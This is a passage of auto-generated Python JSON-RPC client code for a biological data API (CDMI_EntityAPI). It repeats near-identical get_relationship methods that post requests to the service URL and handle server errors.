'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Annotates(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Annotates',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsAssayOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsAssayOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsAssayedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsAssayedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsClassFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsClassFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsInClass(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsInClass',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsCollectionOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsCollectionOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsCollectedInto(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsCollectedInto',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsComposedOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsComposedOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsComponentOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsComponentOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsComprisedOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsComprisedOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Comprises(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Comprises',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsConfiguredBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsConfiguredBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ReflectsStateOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ReflectsStateOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsConservedDomainModelFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsConservedDomainModelFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasConservedDomainModel(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasConservedDomainModel',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsConsistentWith(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsConsistentWith',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsConsistentTo(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsConsistentTo',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsContextOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsContextOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasEnvironment(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasEnvironment',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsCoregulatedWith(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsCoregulatedWith',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasCoregulationWith(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasCoregulationWith',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsCoupledTo(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsCoupledTo',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsCoupledWith(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsCoupledWith',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsDatasetFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsDatasetFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasAssociationDataset(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasAssociationDataset',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsDeterminedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsDeterminedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Determines(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Determines',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsDividedInto(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsDividedInto',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsDivisionOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsDivisionOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsExecutedAs(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsExecutedAs',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsExecutionOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsExecutionOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsExemplarOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsExemplarOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
